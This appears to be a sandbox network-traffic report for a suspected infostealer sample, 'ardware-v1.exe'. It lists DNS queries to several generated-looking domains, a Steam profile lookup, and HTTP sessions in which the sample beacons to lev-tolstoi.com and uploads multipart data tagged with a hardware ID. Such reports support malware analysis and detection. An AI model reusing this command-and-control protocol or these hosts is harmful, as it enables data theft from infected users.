Dec 18, 2024 09:52:59.855942965 CET | 443 | 49943 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:59.856190920 CET | 443 | 49943 | 172.67.157.254 | 192.168.2.5
Dec 18, 2024 09:52:59.856437922 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:59.856437922 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:52:59.856437922 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:53:00.085963011 CET | 49943 | 443 | 192.168.2.5 | 172.67.157.254
Dec 18, 2024 09:53:00.086024046 CET | 443 | 49943 | 172.67.157.254 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 09:52:23.782596111 CET | 52437 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:24.091253996 CET | 53 | 52437 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:24.101138115 CET | 51514 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:25.103064060 CET | 51514 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:25.562846899 CET | 53 | 51514 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:25.562935114 CET | 53 | 51514 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:28.318715096 CET | 61377 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:29.304740906 CET | 61377 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:29.765995026 CET | 53 | 61377 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:29.766036034 CET | 53 | 61377 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:31.439533949 CET | 54285 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:31.748703003 CET | 53 | 54285 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:31.751950979 CET | 49924 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:31.975929976 CET | 53 | 49924 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:31.982467890 CET | 51044 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:32.201455116 CET | 53 | 51044 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:32.204519033 CET | 56842 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:32.604610920 CET | 53 | 56842 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:32.607671976 CET | 55031 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:32.831048965 CET | 53 | 55031 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:32.832361937 CET | 61235 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:33.146445036 CET | 53 | 61235 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:33.149770021 CET | 58605 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:33.287266970 CET | 53 | 58605 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 09:52:35.839624882 CET | 49371 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 09:52:36.151508093 CET | 53 | 49371 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 09:52:23.782596111 CET | 192.168.2.5 | 1.1.1.1 | 0x15f0 | Standard query (0) | spend-shiny.cyou | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:24.101138115 CET | 192.168.2.5 | 1.1.1.1 | 0xfda2 | Standard query (0) | immureprech.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:25.103064060 CET | 192.168.2.5 | 1.1.1.1 | 0xfda2 | Standard query (0) | immureprech.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:28.318715096 CET | 192.168.2.5 | 1.1.1.1 | 0xfed5 | Standard query (0) | deafeninggeh.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:29.304740906 CET | 192.168.2.5 | 1.1.1.1 | 0xfed5 | Standard query (0) | deafeninggeh.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:31.439533949 CET | 192.168.2.5 | 1.1.1.1 | 0xe79d | Standard query (0) | effecterectz.xyz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:31.751950979 CET | 192.168.2.5 | 1.1.1.1 | 0xf272 | Standard query (0) | diffuculttan.xyz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:31.982467890 CET | 192.168.2.5 | 1.1.1.1 | 0x13 | Standard query (0) | debonairnukk.xyz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:32.204519033 CET | 192.168.2.5 | 1.1.1.1 | 0xfa2b | Standard query (0) | wrathful-jammy.cyou | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:32.607671976 CET | 192.168.2.5 | 1.1.1.1 | 0xd726 | Standard query (0) | awake-weaves.cyou | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:32.832361937 CET | 192.168.2.5 | 1.1.1.1 | 0xf7e9 | Standard query (0) | sordid-snaked.cyou | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:33.149770021 CET | 192.168.2.5 | 1.1.1.1 | 0xfad2 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:35.839624882 CET | 192.168.2.5 | 1.1.1.1 | 0xb24d | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 09:52:24.091253996 CET | 1.1.1.1 | 192.168.2.5 | 0x15f0 | Name error (3) | spend-shiny.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:25.562846899 CET | 1.1.1.1 | 192.168.2.5 | 0xfda2 | No error (0) | immureprech.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:25.562846899 CET | 1.1.1.1 | 192.168.2.5 | 0xfda2 | No error (0) | immureprech.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:25.562846899 CET | 1.1.1.1 | 192.168.2.5 | 0xfda2 | No error (0) | immureprech.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:25.562935114 CET | 1.1.1.1 | 192.168.2.5 | 0xfda2 | No error (0) | immureprech.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:25.562935114 CET | 1.1.1.1 | 192.168.2.5 | 0xfda2 | No error (0) | immureprech.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:25.562935114 CET | 1.1.1.1 | 192.168.2.5 | 0xfda2 | No error (0) | immureprech.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:29.765995026 CET | 1.1.1.1 | 192.168.2.5 | 0xfed5 | No error (0) | deafeninggeh.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:29.765995026 CET | 1.1.1.1 | 192.168.2.5 | 0xfed5 | No error (0) | deafeninggeh.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:29.765995026 CET | 1.1.1.1 | 192.168.2.5 | 0xfed5 | No error (0) | deafeninggeh.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:29.766036034 CET | 1.1.1.1 | 192.168.2.5 | 0xfed5 | No error (0) | deafeninggeh.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:29.766036034 CET | 1.1.1.1 | 192.168.2.5 | 0xfed5 | No error (0) | deafeninggeh.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:29.766036034 CET | 1.1.1.1 | 192.168.2.5 | 0xfed5 | No error (0) | deafeninggeh.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:31.748703003 CET | 1.1.1.1 | 192.168.2.5 | 0xe79d | Name error (3) | effecterectz.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:31.975929976 CET | 1.1.1.1 | 192.168.2.5 | 0xf272 | Name error (3) | diffuculttan.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:32.201455116 CET | 1.1.1.1 | 192.168.2.5 | 0x13 | Name error (3) | debonairnukk.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:32.604610920 CET | 1.1.1.1 | 192.168.2.5 | 0xfa2b | Name error (3) | wrathful-jammy.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:32.831048965 CET | 1.1.1.1 | 192.168.2.5 | 0xd726 | Name error (3) | awake-weaves.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:33.146445036 CET | 1.1.1.1 | 192.168.2.5 | 0xf7e9 | Name error (3) | sordid-snaked.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:33.287266970 CET | 1.1.1.1 | 192.168.2.5 | 0xfad2 | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:36.151508093 CET | 1.1.1.1 | 192.168.2.5 | 0xb24d | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:52:36.151508093 CET | 1.1.1.1 | 192.168.2.5 | 0xb24d | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
• immureprech.biz
• deafeninggeh.biz
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49858 | 45.77.249.79 | 443 | 1972 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:52:27 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: immureprech.biz
2024-12-18 08:52:27 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-18 08:52:28 UTC | 94 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:52:27 GMT
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49869 | 104.131.68.180 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:52:31 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: deafeninggeh.biz
2024-12-18 08:52:31 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-18 08:52:31 UTC | 94 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:52:31 GMT
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49879 | 23.55.153.106 | 443 | 1972 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:52:34 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-18 08:52:35 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Wed, 18 Dec 2024 08:52:35 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=a132d2d959faa093de0158e2; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-18 08:52:35 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-18 08:52:35 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-18 08:52:35 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49886        172.67.157.254  443               1972  C:\Users\user\Desktop\ardware-v1.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 08:52:37 UTC  262                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-18 08:52:37 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-18 08:52:38 UTC  1034               IN         HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:52:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7veirhegm0bp5fn1d4t0c0ptoo; expires=Sun, 13-Apr-2025 02:39:16 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B7QsfePKIpYzomUkQI7tfytQyPgUgkp2HoWlS%2BLJX6a7DxP02EcLUBQki2%2FdGESw1aXxM7NIPlKNdIDyAA03nFt04H5PmLURiyiqs8uvc2DtbGHiGepNy5cc9Se3q11kBtE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3deaf748b841d2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1766&rtt_var=721&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1457813&cwnd=251&unsent_bytes=0&cid=e14d6aa5d1955431&ts=728&x=0"
2024-12-18 08:52:38 UTC  7                  IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-18 08:52:38 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.5  49892        172.67.157.254  443               1972  C:\Users\user\Desktop\ardware-v1.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 08:52:39 UTC  263                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 42
Host: lev-tolstoi.com
2024-12-18 08:52:39 UTC  42                 OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 66 4c 38 72 65 2d 2d 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=tfL8re--&j=
2024-12-18 08:52:40 UTC  1037               IN         HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:52:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=eoootphicbc0urf0k275k71att; expires=Sun, 13-Apr-2025 02:39:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0RPMiiHnoZcT4y8XmXFBe%2F8d8RhOFIXSzOd0FubmsOR51%2FdLb4PdZhwOPo0MFtxV7TfCI0jj9kB9%2BiuCCyfnMx0x9RXhARJlVVaL2H8wgsScV9Lpj7W8WSGJFJBLDaD%2FvBw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3deb044bb642c8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1658&rtt_var=641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=941&delivery_rate=1681059&cwnd=225&unsent_bytes=0&cid=2d6b7ea10e779d8d&ts=1054&x=0"
2024-12-18 08:52:40 UTC  332                IN         [encoded response chunk omitted]
2024-12-18 08:52:40 UTC  1369               IN         [encoded response chunk omitted]
2024-12-18 08:52:40 UTC  1369               IN         [encoded response chunk omitted]
2024-12-18 08:52:40 UTC  1369               IN         [encoded response chunk omitted]
2024-12-18 08:52:40 UTC  1369               IN         [encoded response chunk omitted]
2024-12-18 08:52:40 UTC  1369               IN         [encoded response chunk omitted]
2024-12-18 08:52:40 UTC  301                IN         [encoded response chunk omitted]
2024-12-18 08:52:40 UTC  1369               IN         [encoded response chunk omitted]
2024-12-18 08:52:40 UTC  1369               IN         [encoded response chunk omitted]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.5  49899        172.67.157.254  443               1972  C:\Users\user\Desktop\ardware-v1.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 08:52:42 UTC  277                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=3P6WUUG987FHXT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12806
Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:42 UTC12806OUTData Raw: 2d 2d 33 50 36 57 55 55 47 39 38 37 46 48 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 50 36 57 55 55 47 39 38 37 46 48 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 50 36 57 55 55 47 39 38 37 46 48 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 33 50 36 57 55 55 47 39 38 37 46 48 58
                                                                                                                                                                                                                                    Data Ascii: --3P6WUUG987FHXTContent-Disposition: form-data; name="hwid"B7CB4FFA20B498E6AC8923850305D13E--3P6WUUG987FHXTContent-Disposition: form-data; name="pid"2--3P6WUUG987FHXTContent-Disposition: form-data; name="lid"tfL8re----3P6WUUG987FHX
2024-12-18 08:52:42 UTC | 1039 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:52:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=283kg4n7oaaui3hjptr1nc1jgq; expires=Sun, 13-Apr-2025 02:39:21 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UcaH5xi8dIe44I%2BqIncc8Jd93sMs45LNXBN9OU4wPOMom%2BymyctT%2FwfNZfEU4hiGncFenlauwBsEBap4Y0O2fPme7tsxueFBZoQUVH31pTM%2FWbIIq5lMGdfyiPtjyDoNedQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3deb140e3e41d3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1736&rtt_var=662&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13741&delivery_rate=1640449&cwnd=32&unsent_bytes=0&cid=4dc635b16eebebb5&ts=739&x=0"
2024-12-18 08:52:42 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 08:52:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49905 | 172.67.157.254 | 443 | 1972 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:52:44 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=H35EOF1EQDXQI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15042
Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:44 UTC15042OUTData Raw: 2d 2d 48 33 35 45 4f 46 31 45 51 44 58 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 33 35 45 4f 46 31 45 51 44 58 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 33 35 45 4f 46 31 45 51 44 58 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 48 33 35 45 4f 46 31 45 51 44 58 51 49 0d 0a 43
                                                                                                                                                                                                                                    Data Ascii: --H35EOF1EQDXQIContent-Disposition: form-data; name="hwid"B7CB4FFA20B498E6AC8923850305D13E--H35EOF1EQDXQIContent-Disposition: form-data; name="pid"2--H35EOF1EQDXQIContent-Disposition: form-data; name="lid"tfL8re----H35EOF1EQDXQIC
2024-12-18 08:52:46 UTC | 1045 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:52:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8vio1oeneco7u09pa8kcqfafob; expires=Sun, 13-Apr-2025 02:39:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BwU7IoTQBzQOL1eVhkhOEGBIKeTDKbRvoKR6EI3cT21DntJetXgT3%2F2F%2FJoxX3n02xZev%2FwBs3%2F2ceoZke7iyCgDnmY98mzq3AzJdorSiTiEt%2BD0%2BsD0GkUt030lNBhSATY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3deb20c8304264-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1745&rtt_var=660&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15976&delivery_rate=1650650&cwnd=220&unsent_bytes=0&cid=7ad3eb7757b8b3e7&ts=2495&x=0"
2024-12-18 08:52:46 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 08:52:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49915 | 172.67.157.254 | 443 | 1972 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:52:48 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=9LGACG00F8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20514
Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:48 UTC15331OUTData Raw: 2d 2d 39 4c 47 41 43 47 30 30 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 4c 47 41 43 47 30 30 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 4c 47 41 43 47 30 30 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 39 4c 47 41 43 47 30 30 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                    Data Ascii: --9LGACG00F8Content-Disposition: form-data; name="hwid"B7CB4FFA20B498E6AC8923850305D13E--9LGACG00F8Content-Disposition: form-data; name="pid"3--9LGACG00F8Content-Disposition: form-data; name="lid"tfL8re----9LGACG00F8Content-Dispo
